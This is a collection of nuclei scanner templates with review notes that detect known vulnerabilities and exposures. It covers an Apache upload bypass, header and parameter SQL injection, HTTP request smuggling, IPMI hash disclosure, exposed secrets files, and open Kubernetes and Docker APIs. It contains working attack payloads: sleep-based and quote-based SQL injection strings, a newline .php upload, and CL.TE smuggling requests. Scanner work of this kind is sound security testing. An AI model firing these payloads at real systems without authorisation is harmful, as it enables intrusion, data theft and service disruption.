-------------------------------------------------------------------------------- /CVE-2017-15715.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2017-15715 2 | 3 | info: 4 | name: Apache Arbitrary File Upload 5 | author: geeknik 6 | description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in <FilesMatch> could 
match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename. 7 | reference: https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715 8 | severity: high 9 | tags: cve,cve2017,apache,httpd,fileupload 10 | 11 | requests: 12 | - raw: 13 | - | 14 | POST / HTTP/1.1 15 | Host: {{Hostname}} 16 | Content-Length: 264 17 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ 18 | Accept-Encoding: gzip, deflate 19 | Connection: close 20 | 21 | ------WebKitFormBoundaryKc8fBVDo558U4hbJ 22 | Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" 23 | 24 | {{randstr_1}} 25 | 26 | ------WebKitFormBoundaryKc8fBVDo558U4hbJ 27 | Content-Disposition: form-data; name="name" 28 | 29 | {{randstr}}.php\x0A 30 | ------WebKitFormBoundaryKc8fBVDo558U4hbJ-- 31 | 32 | - | 33 | GET /{{randstr}}.php\x0A HTTP/1.1 34 | Host: {{Hostname}} 35 | Accept-Encoding: gzip,deflate 36 | Accept: */* 37 | Accept-Language: en 38 | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) 39 | Connection: close 40 | 41 | req-condition: true 42 | matchers: 43 | - type: dsl 44 | dsl: 45 | - 'contains(body_2, "{{randstr_1}}")' -------------------------------------------------------------------------------- /keys-js.yaml: -------------------------------------------------------------------------------- 1 | id: keys-js 2 | 3 | info: 4 | name: keys.js 5 | author: geeknik 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/keys.js" 12 | - "{{BaseURL}}/api/keys.js" 13 | - "{{BaseURL}}/config/keys.js" 14 | - "{{BaseURL}}/web/keys.js" 15 | - "{{BaseURL}}/src/keys.js" 16 | - "{{BaseURL}}/src/api/keys.js" 17 | - "{{BaseURL}}/web/api/keys.js" 18 | 19 | matchers-condition: and 20 | matchers: 21 | - type: 
status 22 | status: 23 | - 200 24 | - type: word 25 | words: 26 | - "MONGODB_URI:" 27 | - type: word 28 | part: header 29 | words: 30 | - "text/plain" 31 | - "text/javascript" 32 | - "application/javascript" 33 | - "application/x-javascript" 34 | condition: or 35 | - type: word 36 | part: header 37 | words: 38 | - "text/html" 39 | negative: true 40 | - type: word 41 | part: body 42 | words: 43 | - "<html" 44 | - "window.location = x" 45 | - "can not find keys.js" 46 | - "function _popwnd_open" 47 | - "window.dataLayer" 48 | - "console.log(" 49 | - "window.location" 50 | - "Unknown Host" 51 | - "<h1" 52 | - "Error 404: Error not found" 53 | - "SERVICE_NOT_EXIST" 54 | - "<p>" 55 | - "Static content proxy" 56 | - "ABORTED" 57 | - "// Cedexis Inc." 58 | - "This is a placeholder." 59 | - "Counting any requests" 60 | - ": 409," 61 | - "No action executes!" 62 | condition: or 63 | negative: true 64 | - type: dsl 65 | dsl: 66 | - "len(body) > 50 && len(body) < 1024" 67 | -------------------------------------------------------------------------------- /auth-js.yaml: -------------------------------------------------------------------------------- 1 | id: auth-js 2 | 3 | info: 4 | name: auth.js 5 | author: geeknik 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/auth.js" 12 | - "{{BaseURL}}/api/auth.js" 13 | - "{{BaseURL}}/config/auth.js" 14 | - "{{BaseURL}}/web/auth.js" 15 | - "{{BaseURL}}/src/auth.js" 16 | - "{{BaseURL}}/src/api/auth.js" 17 | - "{{BaseURL}}/web/api/auth.js" 18 | 19 | matchers-condition: and 20 | matchers: 21 | - type: status 22 | status: 23 | - 200 24 | - type: word 25 | words: 26 | - "state_token =" 27 | - "client_secret" 28 | condition: and 29 | - type: word 30 | part: header 31 | words: 32 | - "text/plain" 33 | - "text/javascript" 34 | - "application/javascript" 35 | - "application/x-javascript" 36 | condition: or 37 | - type: word 38 | part: header 39 | words: 40 | - "text/html" 41 | negative: true 42 | - type: word 
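# (continuation of auth-js.yaml: tail of the negative error-page matcher and the size check)
      part: body
      words:
        - "<html"
        - "window.location = x"
        - "can not find auth.js"
        - "function _popwnd_open"
        - "window.dataLayer"
        - "console.log("
        - "window.location"
        - "Unknown Host"
        - "<h1"
        - "Error 404: Error not found"
        - "SERVICE_NOT_EXIST"
        - "<p>"
        - "Static content proxy"
        - "ABORTED"
        - "// Cedexis Inc."
        - "This is a placeholder."
        - "Counting any requests"
        - ": 409,"
        - "No action executes!"
      condition: or
      negative: true
    - type: dsl
      dsl:
        - "len(body) > 50 && len(body) < 8192"

-------------------------------------------------------------------------------- /header-blind-sql-injection.yaml: --------------------------------------------------------------------------------
id: header-blind-sql-injection
info:
  name: Header Blind SQL Injection
  author: geeknik
  severity: high
  tags: blind-sqli

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    # Review notes on this check:
    #  * Every header carries the same MySQL/MariaDB-only "sleep(30)" payload
    #    in ONE request. nuclei's default per-request timeout is 10s, so unless
    #    it is run with -timeout >= 35 the request is cut off long before
    #    "duration>=29" can be true; and if several headers reach a query the
    #    delays add up. Other DBMS delay functions (pg_sleep, WAITFOR DELAY,
    #    dbms_pipe.receive_message) are not covered.
    #  * A ~29s response is also what a slow origin, a WAF tarpit or a
    #    saturated link produce. Confirm a hit with a baseline request and a
    #    second run using a different delay before reporting it.
    #  * A user-supplied Content-Length on a bodiless GET is dropped by Go's
    #    HTTP client when it writes the request, so that entry appears to be
    #    a no-op (TODO confirm).
    headers:
      Accept: "' or sleep(30)='"
      Accept-Charset: "' or sleep(30)='"
      Accept-Datetime: "' or sleep(30)='"
      Accept-Encoding: "' or sleep(30)='"
      Accept-Language: "' or sleep(30)='"
      Authorization: "' or sleep(30)='"
      Cache-Control: "' or sleep(30)='"
      Connection: "' or sleep(30)='"
      Content-Length: "' or sleep(30)='"
      Content-MD5: "' or sleep(30)='"
      Content-Type: "' or sleep(30)='"
      Cookie: "' or sleep(30)='"
      Date: "' or sleep(30)='"
      Expect: "' or sleep(30)='"
      Forwarded: "' or sleep(30)='"
      From: "' or sleep(30)='"
      If-Match: "' or sleep(30)='"
      If-Modified-Since: "' or sleep(30)='"
      If-None-Match: "' or sleep(30)='"
      If-Range: "' or sleep(30)='"
      If-Unmodified-Since: "' or sleep(30)='"
      Max-Forwards: "' or sleep(30)='"
      Origin: "' or sleep(30)='"
      Pragma: "' or sleep(30)='"
      Proxy-Authorization: "' or sleep(30)='"
      Range: "' or sleep(30)='"
      Referer: "' or sleep(30)='"
      TE: "' or sleep(30)='"
      Upgrade: "' or sleep(30)='"
      User-Agent: "' or sleep(30)='"
      Via: "' or sleep(30)='"
      Warning: "' or sleep(30)='"
      X-Client-IP: "' or sleep(30)='"
      X-Remote-IP: "' or sleep(30)='"
      X-Remote-Addr: "' or sleep(30)='"
      X-Forwarded-For: "' or sleep(30)='"
      X-Originating-IP: "' or sleep(30)='"
      X-Host: "' or sleep(30)='"
      X-Forwarded-Host: "' or sleep(30)='"

    matchers:
      # Time-based only; see the notes above about timeout and false positives.
      - type: dsl
        dsl:
          - 'duration>=29'

-------------------------------------------------------------------------------- /config-js.yaml: --------------------------------------------------------------------------------
id: config-js

info:
  name: config.js
  author: geeknik
  severity: high

requests:
  - method: GET
    path:
      - "{{BaseURL}}/config.js"
      - "{{BaseURL}}/api/config.js"
      - "{{BaseURL}}/app/config.js"
      - "{{BaseURL}}/config/config.js"
      - "{{BaseURL}}/web/config.js"
      - "{{BaseURL}}/src/config.js"
      - "{{BaseURL}}/src/api/config.js"
      - "{{BaseURL}}/web/api/config.js"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      # Secret-bearing keys that mark a server-side config served as a script.
      - type: word
        part: body
        words:
          - "accessKey: "
          # Bug fix: was "secreKey: " (typo), a key no real config contains.
          - "secretKey: "
          - "apiKey: "
          - '"client_secret": '
          - "mongodb+srv://"
        condition: or
      - type: word
        part: header
        words:
          - "text/plain"
          - "text/javascript"
          - "application/javascript"
          - "application/x-javascript"
        condition: or
      - type: word
        part: header
        words:
          - "text/html"
        negative: true
      # Error pages, CDN placeholders and front-end bootstrap scripts that are
      # routinely served at these paths.
      - type: word
        part: body
        words:
          - "<html"
          - "window.location = x"
          - "can not find config.js"
          - "function _popwnd_open"
          - "window.dataLayer"
          - "console.log("
          - "window.location"
          - "Unknown Host"
          - "<h1"
          - "Error 404: Error not found"
          - "SERVICE_NOT_EXIST"
          - "<p>"
          - "Static content proxy"
          - "ABORTED"
          - "// Cedexis Inc."
          - "This is a placeholder."
          - "Counting any requests"
          - ": 409,"
          - "No action executes!"
        condition: or
        negative: true
      - type: dsl
        dsl:
          - "len(body) > 50 && len(body) < 16384"

-------------------------------------------------------------------------------- /CVE-2013-4786.yaml: --------------------------------------------------------------------------------
id: CVE-2013-4786

info:
  name: IPMI 2.0 RAKP Authentication Remote Password Hash Disclosure
  author: geeknik
  severity: high
  description: |
    The IPMI 2.0 specification supports RMCP+ Authenticated Key-Exchange Protocol authentication, which allows remote attackers to obtain password hashes and conduct offline password guessing attacks by extracting HMAC from a BMC response during authentication.
    Review note - this is a design flaw of the RAKP exchange, so every reachable IPMI 2.0 BMC is affected. As written, the template identifies an IPMI 2.0 responder; it does not itself retrieve a usable hash (see the matcher notes below).
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2013-4786
    - http://fish2.com/ipmi/remote-pw-cracking.html
    - https://www.rapid7.com/blog/post/2013/07/02/a-penetration-testers-guide-to-ipmi/
  classification:
    cve-id: CVE-2013-4786
    cwe-id: CWE-255
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
  tags: cve,cve2013,ipmi,rakp,authentication-bypass,network

network:
  - inputs:
      # Review note: the two payloads differ in a single byte (0x18 vs 0x1c)
      # and carry neither a console session ID nor a username/role, which a
      # RAKP Message 1 requires per the IPMI 2.0 specification. Verify both
      # against the spec or a known-good client (ipmitool, Metasploit's
      # ipmi_dumphashes) before reading any reply as a "RAKP response".
      - data: 0600ff07000000000000000000092018c88100388e04b5
        type: hex
        description: IPMI RMCP+ Open Session Request
      - data: 0600ff0700000000000000000009201cc88100388e04b5
        type: hex
        description: IPMI RAKP1 Authentication Request

    host:
      # IPMI-over-LAN (RMCP/RMCP+) is UDP/623, while nuclei network requests
      # default to TCP. TODO confirm how this nuclei version selects UDP for a
      # host entry; over TCP a BMC will not answer and nothing below can match.
      - "{{Hostname}}:623"

    read-timeout: 10s
    # With "or" the loosest matcher decides: "0600ff07" is just the RMCP
    # header (version 6, sequence 0xff, class 7 = IPMI) and matches ANY IPMI
    # reply, which is why the description above calls this a responder check.
    matchers-condition: or
    matchers:
      - type: binary
        binary:
          - "0600ff07"
        name: ipmi_rmcp_response
        condition: and

      - type: regex
        regex:
          - "\\x06\\x00\\xff\\x07.*\\x00\\x00\\x00\\x08"
        name: ipmi_session_response
        condition: and

      - type: binary
        binary: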
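# (continuation of CVE-2013-4786.yaml: byte patterns of the third matcher and the extractors)
          - "060000"
          - "ff07"
        name: ipmi_rakp_response
        condition: and

    extractors:
      - type: regex
        name: ipmi_session_id
        regex:
          # Bug fix: the former "(?=.*RAKP)" lookahead is not supported by
          # Go's RE2 engine, so the regex (and with it the template) failed to
          # compile; a plain ".*RAKP" with group 1 keeps the intended capture.
          # Note the BMC answers in raw bytes and "RAKP"/"Session" are ASCII
          # markers a binary response will not normally contain -- verify
          # against a real BMC before relying on these extractors.
          - "([a-fA-F0-9]{8}).*RAKP"
          - "Session.*?([a-fA-F0-9]{8})"
        group: 1
        part: body

      # Bug fix: "binary" is not a nuclei extractor type (regex, kval, json,
      # xpath, dsl), which likewise prevented the template from loading.
      # A 40-hex-character run only exists if the response is hex-encoded
      # somewhere; the raw SHA1-HMAC is 20 bytes of binary.
      - type: regex
        name: potential_hash_data
        regex:
          - "([a-fA-F0-9]{40})"
        part: body

-------------------------------------------------------------------------------- /oauth-state-bypass.yaml: --------------------------------------------------------------------------------
id: oauth-state-bypass
info:
  name: OAuth State Parameter Bypass Detection
  author: geeknik
  severity: high
  description: |
    Detects OAuth implementations vulnerable to CSRF attacks through missing,
    predictable, or reusable state parameters in OAuth authorization flows.
    Review note - "state" is a CLIENT-side CSRF defence (RFC 6749 section
    10.12); the authorization server is only required to echo the value it
    was given. What this template can observe is an authorization server
    that answers an unregistered client_id / foreign redirect_uri with a
    code-bearing redirect, or that drops the state it was sent. Treat a hit
    as a lead for manual review of the real client's callback handling.
  reference:
    - https://portswigger.net/web-security/oauth
    - https://datatracker.ietf.org/doc/html/rfc6749#section-10.12
  classification:
    cwe-id: CWE-352
  tags: oauth,csrf,authentication,bypass
  metadata:
    max-request: 5

variables:
  redirect_uri: "https://example.com/callback"
  client_id: "test_client_{{randstr}}"

requests:
  - method: GET
    path:
      - "{{BaseURL}}/oauth/authorize?response_type=code&client_id={{client_id}}&redirect_uri={{redirect_uri}}"
      - "{{BaseURL}}/oauth/authorize?response_type=code&client_id={{client_id}}&redirect_uri={{redirect_uri}}&state="
      - "{{BaseURL}}/oauth/authorize?response_type=code&client_id={{client_id}}&redirect_uri={{redirect_uri}}&state=predictable123"
      - "{{BaseURL}}/auth/oauth/authorize?response_type=code&client_id={{client_id}}&redirect_uri={{redirect_uri}}"
      - "{{BaseURL}}/oauth2/authorize?response_type=code&client_id={{client_id}}&redirect_uri={{redirect_uri}}"

    # Bug fix: redirects were followed ("redirects: true", max 3), so the
    # matchers below were evaluated against the FINAL response -- the redirect
    # target (here example.com) -- instead of the authorization server's own
    # 302 and Location header. Redirect following is now off (nuclei default),
    # which also stops the scanner from calling out to example.com.
    #
    # Bug fix: the matchers were OR-ed, so a bare "302 without state=" fired
    # on every login redirect and "state=" in a header fired whenever the
    # server correctly echoed the state we sent. All three conditions are now
    # required together.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 302
      # The server redirected back with an authorization code ...
      - type: regex
        part: header
        regex:
          - '(?i)Location:.*[?&]code='
      # ... and no state (either none was issued, or the one we sent was dropped).
      - type: dsl
        dsl:
          - "!contains(tolower(location), 'state=')"

    extractors:
      - type: regex
        part: header
        name: oauth_flow
        regex:
          # Bug fix: '[^s]+' stopped at the first letter "s"; '[^\s]+' was meant.
          - 'Location:\s*([^\s]+)'

      - type: regex
        part: header
        regex:
          - '[?&]state=([^&]+)'
          - '[?&]code=([^&]+)'

-------------------------------------------------------------------------------- /kubernetes-api-exposure.yaml: --------------------------------------------------------------------------------
id: kubernetes-api-exposure
info:
  name: Kubernetes API Server Exposure Detection
  author: geeknik
  severity: critical
  description: |
    Detects exposed Kubernetes API servers that may allow unauthorized access
    to cluster resources, secrets, and potential container escape paths.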
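# (continuation of kubernetes-api-exposure.yaml: rest of the info block and the request)
  reference:
    - https://kubernetes.io/docs/reference/access-authn-authz/
    - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/
  classification:
    cwe-id: CWE-284
  tags: kubernetes,k8s,cloud,api,exposure,critical
  metadata:
    max-request: 8

requests:
  - method: GET
    path:
      # Ordered least to most sensitive: with stop-at-first-match an open
      # server is reported from /api and the pod/secret listings are never
      # pulled by the scanner.
      - "{{BaseURL}}/api"
      - "{{BaseURL}}/api/v1"
      - "{{BaseURL}}/apis"
      - "{{BaseURL}}/api/v1/namespaces"
      - "{{BaseURL}}/api/v1/namespaces/default/pods"
      - "{{BaseURL}}/api/v1/namespaces/default/secrets"
      - "{{BaseURL}}/api/v1/nodes"
      - "{{BaseURL}}/version"

    headers:
      User-Agent: kubectl/v1.25.0

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      # Every API-server JSON object carries kind + apiVersion.
      - type: word
        part: body
        words:
          - '"kind":'
          - '"apiVersion":'
        condition: and

      - type: word
        part: body
        words:
          - '"major":'
          - '"minor":'
          - '"gitVersion":'
          - '"resourceVersion":'
          - '"selfLink":'
          - '"items":'
          - '"metadata":'
          # Moved here from the required group above: a quoted "kubernetes"
          # token is not part of the /api, /apis or /version responses, so
          # requiring it suppressed genuine hits (hedged -- verify against a
          # live cluster). It stays as a supporting signal.
          - '"kubernetes"'
        condition: or

      # Bug fix: 403 was previously accepted. A 403 is the API server's
      # authn/authz layer DENYING the anonymous request ("kind":"Status",
      # "reason":"Forbidden"): the server is reachable, but that is not the
      # unauthenticated read access a critical finding claims. Only 200 shows
      # the anonymous principal can read the resource.
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "application/json"

    extractors:
      - type: regex
        part: body
        regex:
          - '"gitVersion":\s*"v([0-9]+\.[0-9]+\.[0-9]+)"'
          - '"name":\s*"([^"]+)"'
          - '"namespace":\s*"([^"]+)"'

      # Only object names are extracted. Never add .data / .stringData here:
      # that would copy live secret material into scan output.
      - type: json
        json:
          - '.items[].metadata.name'
          - '.items[].spec.nodeName'
          - '.items[].spec.serviceAccountName'

-------------------------------------------------------------------------------- /dom-xss.yaml: --------------------------------------------------------------------------------
id: dom-xss

info:
  name: DOM XSS Sources & Sinks
  reference: https://portswigger.net/blog/introducing-dom-invader
  author: geeknik
  severity: info
  tags: dom,xss
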
10 | file: 11 | - extensions: 12 | - js 13 | - ts 14 | - html 15 | - php 16 | - cs 17 | - rb 18 | - py 19 | 20 | extractors: 21 | - type: regex 22 | name: sink 23 | part: body 24 | regex: 25 | - 'jQuery(\.globalEval|\.\$|\..constructor|\.parseHTML|\.has|\.init|\.index|\.add|\.append|\.appendTo|\.after|\.insertAfter|\.before|\.insertBefore|\.html|\.prepend|\.prependTo|\.replaceWith|\.replaceAll|\.wrap|\.wrapALL|\.wrapInner|\.prop\.innerHTML|\.prop\.outerHTML|\.attr\.onclick|\.attr\.onmouseover|\.attr.onmousedown|\.attr\.onmouseup|\.attr\.onkeydown|\.attr\.onkeypress|\.attr\.onkeyup|\.attr\.href|\.attr\.src|\.attr\.data|\.attr\.action|\.attr\.formaction|\.prop\.href|\.prop\.src|\.prop\.data|\.prop\.action|\.prop\.formaction)' 26 | - 'eval|Function|execScript|msSetImmediate|fetch(\.body)?|form\.action|websocket|RegExp|javascriptURL|createContextualFragment|webdatabase\.executeSql|JSON\.parse' 27 | - 'fetch(\.body)?' 28 | - 'history(\.pushState|\.replaceState)' 29 | - '(session|local)Storage(\.setItem(\.name|\.value))' 30 | - 'anchor(\.href|\.target)' 31 | - 'button(\.formaction|\.value)' 32 | - 'set(Timeout|Interval|Immediate)' 33 | - 'script(\.src|\.textContent|\.innerText|\.innerHTML|\.appendChild|\.append)' 34 | - 'document(\.write|\.writeln|\.implementation\.createHTMLDocument|\.domain|\.cookie|\.evaluate)' 35 | - 'element(\.outerText|\.innerText|\.textContent|\.style\.cssText|\.innerHTML|\.outerHTML|\.insertAdjacentHTML|\.setAttribute(\.onclick|\.onmouseover|\.onmousedown|\.onmouseup|\.onkeydown|\.onkeypress|\.onkeyup|\.href|\.src|\.data|\.action|\.formaction))' 36 | - 'location(\.href|\.replace|\.assign|\.pathname|\.protocol|\.host|\.hostname|\.hash|\.search)?' 37 | - 'iframe(\.srcdoc|\.src)' 38 | - 'xhr(\.open|\.send|\.setRequestHeader(\.name|\.value)?)' 39 | - type: regex 40 | name: source 41 | part: body 42 | regex: 43 | - 'location(\.href|\.hash|\.search|\.pathname)?' 
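# (tail of dom-xss.yaml: the last two "source" regexes)
          - 'window\.name'
          - 'document(\.URL|\.referrer|\.documentURI|\.baseURI|\.cookie)'

-------------------------------------------------------------------------------- /http2-request-smuggling.yaml: --------------------------------------------------------------------------------
id: http2-request-smuggling
info:
  name: HTTP/2 Request Smuggling Detection
  author: geeknik
  severity: high
  description: |
    Sends a set of malformed, HTTP/2-flavoured requests (connection preface,
    conflicting Content-Length/Transfer-Encoding, fake stream/settings
    headers, pseudo-headers) over a plain HTTP/1 connection and reports front
    ends that answer with HTTP/2-related errors.
    Review note - nuclei raw requests are HTTP/1 text, so no HTTP/2 framing
    (HPACK, SETTINGS, streams) is exercised and this cannot demonstrate an
    H2.CL / H2.TE desync. It is a lead generator for manual testing with a
    real HTTP/2-capable client (see the references), and it also matches
    servers that merely reject the malformed input with a 400/505.
  reference:
    - https://portswigger.net/research/http2
    - https://www.blackhat.com/us-21/briefings/schedule/#http2-the-sequel-is-always-worse-22668
  classification:
    cwe-id: CWE-444
  tags: http2,smuggling,desync,critical
  metadata:
    max-request: 5

http:
  - raw:
      # 1. h2c connection preface sent as cleartext.
      - |
        PRI * HTTP/2.0

        SM

      # 2. Conflicting framing headers (TE/CL ambiguity).
      - |
        GET /test HTTP/2
        Host: {{Hostname}}
        Transfer-Encoding: chunked
        Content-Length: 0

      # 3. Made-up X-HTTP2-* headers: no server or proxy is specified to honour
      #    these; they only show how unknown headers are passed through.
      - |
        GET /admin HTTP/2
        Host: {{Hostname}}
        X-HTTP2-Settings: AAMAAABkAAQAoAAAAAIAAAAA
        X-HTTP2-Stream-ID: 1
        X-HTTP2-Stream-Weight: 256

      # 4. CL.TE probe: Content-Length 13 covers "0\r\n\r\nGET /adm", so a
      #    chunked-aware hop sees the start of a second request.
      - |
        POST /search HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 13
        Transfer-Encoding: chunked

        0

        GET /admin HTTP/1.1
        Host: {{Hostname}}

      # 5. HTTP/2 pseudo-headers inside an HTTP/1 header block (invalid by
      #    definition; a compliant front end must reject them).
      - |
        GET / HTTP/2
        Host: {{Hostname}}
        :method: GET
        :path: /admin
        :scheme: https
        :authority: {{Hostname}}

    # unsafe: the raw bytes go out as written (no header normalisation or
    # Content-Length recomputation), which the CL.TE probe depends on.
    unsafe: true
    matchers-condition: or
    matchers:
      # Each of these also fires on a generic error page that mentions HTTP/2
      # -- expect false positives; confirm any desync by hand before reporting.
      - type: word
        part: body
        words:
          - "HTTP/2"
          - "stream error"
          - "protocol error"
          - "SETTINGS_ENABLE_PUSH"
        condition: or

      - type: regex
        part: header
        regex:
          - 'X-HTTP2-Stream-\w+:'
          - 'X-Forwarded-Proto:\s*h2'

      - type: dsl
        dsl:
          - "contains(tolower(all_headers), 'http/2')"
          - "status_code == 400 || status_code == 421 || status_code == 505"
        condition: and

    extractors:
      - type: regex
        part: header
        regex:
          - 'X-HTTP2-Stream-ID:\s*(\d+)'
          - 'X-HTTP2-Stream-Weight:\s*(\d+)'

-------------------------------------------------------------------------------- /CVE-2020-36112.yaml: --------------------------------------------------------------------------------
id: CVE-2020-36112

info:
  name: CSE Bookstore 1.0 SQL Injection
  author: geeknik
  description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.
  reference: https://www.exploit-db.com/exploits/49314
  severity: high
  tags: cve,cve2020,sqli,cse

requests:
  # Error-based check only: a single quote is appended to pubid / bookisbn and
  # the application's own MySQL error text is matched. The PHPSESSID cookies
  # are arbitrary placeholders; they are not needed for the injection.
  - raw:
      - |
        GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        DNT: 1
        Connection: close
        Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
        Upgrade-Insecure-Requests: 1

      - |
        POST /ebook/cart.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
        Connection: close
        Cache-Control: max-age=0
        Referer: http://{{Hostname}}/ebook/book.php?bookisbn=978-1-1180-2669-4
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 57
        Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9

        bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart

      - |
        GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
        Connection: close
        Cache-Control: max-age=0
        Referer: http://{{Hostname}}/ebook/books.php
        Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on

    matchers:
      - type: word
        part: body
        words:
          - "get book price failed! You have an error in your SQL syntax"
          - "Can't retrieve data You have an error in your SQL syntax"
        condition: or

-------------------------------------------------------------------------------- /container-escape-detection.yaml: --------------------------------------------------------------------------------
id: container-escape-detection
info:
  name: Container Escape Vulnerability Detection
  author: geeknik
  severity: critical
  description: |
    Detects indicators of container escape vulnerabilities including exposed
    Docker sockets, privileged containers, and host filesystem access.
    Review note - from the outside the observable indicators are (a) container
    runtime files (cgroup paths, service-account tokens) reachable through the
    web root or a traversal flaw and (b) a Docker Engine API answering
    unauthenticated on the scanned port. This template is read-only: the
    former "POST /containers/create" probe, which created a privileged
    container with the host root bind-mounted on any exposed daemon and never
    removed it, has been dropped.
  reference:
    - https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/
    - https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout
  classification:
    cwe-id: CWE-269
  tags: docker,container,escape,privilege-escalation,critical
  metadata:
    max-request: 11

requests:
  # 1. Runtime files served by (or traversable through) the web application.
  #    /var/run/docker.sock is a unix socket with no fetchable content; the
  #    path is kept for parity with the original list but can only ever be a
  #    negative.
  - method: GET
    path:
      - "{{BaseURL}}/var/run/docker.sock"
      - "{{BaseURL}}/.dockerenv"
      - "{{BaseURL}}/secrets/kubernetes.io/serviceaccount/token"
      - "{{BaseURL}}/run/secrets/kubernetes.io/serviceaccount/token"
      - "{{BaseURL}}/var/run/secrets/kubernetes.io/serviceaccount/token"
      - "{{BaseURL}}/proc/self/cgroup"
      - "{{BaseURL}}/proc/1/cgroup"

    matchers:
      # Bug fix: the former word matcher ("docker" / "kubepods" / "containerd",
      # OR-ed) reported a critical finding for any page that merely mentions
      # Docker. Only shapes specific to the requested files are accepted now.
      - type: regex
        part: body
        regex:
          - '/docker/[a-f0-9]{64}'
          - '/kubepods/[a-f0-9-]+'
          # A service-account token is a JWT: base64url of '{"' is "eyJ".
          - 'eyJ[A-Za-z0-9_-]+\.eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+'

  # 2. Unauthenticated Docker Engine API (read-only container listing).
  - method: GET
    path:
      - "{{BaseURL}}/v1.24/containers/json"
      - "{{BaseURL}}/v1.40/containers/json"
      - "{{BaseURL}}/v1.41/containers/json"

    headers:
      Host: docker

    matchers:
      - type: word
        part: body
        words:
          - '"Id":'
          - '"Image":'
          - '"Command":'
        condition: and

  # 3. Engine version endpoint -- replaces the privileged container creation.
  #    Proving that privileged creation is permitted is a manual step for an
  #    authorised engagement (and the container must be deleted afterwards).
  - method: GET
    path:
      - "{{BaseURL}}/version"

    headers:
      Host: docker

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      # Field names of the Engine API GET /version response (hedged: confirm
      # against the Engine API reference for the daemon versions in scope).
      - type: word
        part: body
        words:
          - '"ApiVersion":'
          - '"MinAPIVersion":'
        condition: and

    extractors:
      - type: json
        json:
          - '.ApiVersion'
          - '.Version'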
-------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Claude AI Assistant files 2 | .claude 3 | CLAUDE.md 4 | Claude.md 5 | CLAUDE_* 6 | claude_* 7 | .claude_* 8 | 9 | # Warp terminal files 10 | .warp/ 11 | *.warp 12 | 13 | # OS generated files 14 | .DS_Store 15 | .DS_Store? 16 | ._* 17 | .Spotlight-V100 18 | .Trashes 19 | ehthumbs.db 20 | Thumbs.db 21 | 22 | # Editor and IDE files 23 | .vscode/ 24 | .idea/ 25 | *.swp 26 | *.swo 27 | *~ 28 | .vim/ 29 | *.sublime-* 30 | 31 | # Temporary files 32 | *.tmp 33 | *.temp 34 | *.bak 35 | *.backup 36 | *.orig 37 | *.rej 38 | *.patch 39 | resume.cfg 40 | 41 | # Logs 42 | *.log 43 | logs/ 44 | npm-debug.log* 45 | yarn-debug.log* 46 | yarn-error.log* 47 | 48 | # Environment and configuration files 49 | .env 50 | .env.local 51 | .env.development.local 52 | .env.test.local 53 | .env.production.local 54 | config.local.* 55 | .nuclei-ignore 56 | 57 | # Build and output directories 58 | dist/ 59 | build/ 60 | out/ 61 | target/ 62 | 63 | # Dependency directories 64 | node_modules/ 65 | vendor/ 66 | .pnpm-store/ 67 | 68 | # Package manager files 69 | package-lock.json 70 | yarn.lock 71 | pnpm-lock.yaml 72 | 73 | # Go specific 74 | # Binaries for programs and plugins 75 | *.exe 76 | *.exe~ 77 | *.dll 78 | *.so 79 | *.dylib 80 | 81 | # Test binary, built with `go test -c` 82 | *.test 83 | 84 | # Output of the go coverage tool, specifically when used with LiteIDE 85 | *.out 86 | 87 | # Go workspace file 88 | go.work 89 | go.work.sum 90 | 91 | # Python specific 92 | __pycache__/ 93 | *.py[cod] 94 | *$py.class 95 | *.so 96 | 